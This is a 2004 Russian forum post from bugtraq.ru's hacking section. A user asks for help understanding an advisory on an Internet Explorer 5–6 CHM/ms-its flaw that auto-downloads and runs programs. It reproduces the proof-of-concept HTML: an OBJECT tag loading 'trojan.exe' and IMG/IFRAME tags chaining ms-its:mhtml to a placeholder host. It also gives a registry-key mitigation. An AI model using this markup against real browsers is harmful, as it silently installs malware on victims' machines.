информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100
Страшный баг в WindowsЗа кого нас держат?Атака на Internet
BugTraq.Ru
Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Бэкдор в xz/liblzma, предназначенный... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
Уязвимость в IE, помогите разобраться... 04.03.04 21:36  
Автор: choor Статус: Elderman
<"чистая" ссылка>
Обращался к 2 специалистам, никто не мог понять как она действует.... Попробуйте организовать то что ниже написанно и если у вас получится это бдует чудо!!!

Автоматическая загрузка и выполнение произвольных фалов в Microsoft Internet Explorer

Программа: Microsoft Internet Explorer 5.0.1-6.0

Опасность:

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Microsoft Internet Explorer при обработке CHM файлов. Удаленный атакующий может автоматически загрузить и выполнить произвольные программы на целевом клиентне.

Пример:

LAUNCH.HTML:

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='trojan.exe'>

Чтобы запустить LAUNCH.HTML как CHM файл:
<IMG SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IMG
SRC='ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'><IFRAME
SRC='redirgen.php?url=URL:ms-its:mhtml:file://C:\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm'>

URL производителя: http://www.Microsoft.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Удалите следующий ключ реестра:

HKEY_CLASSES_ROOT\PROTOCOLS\Handler\ms-its
1




Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach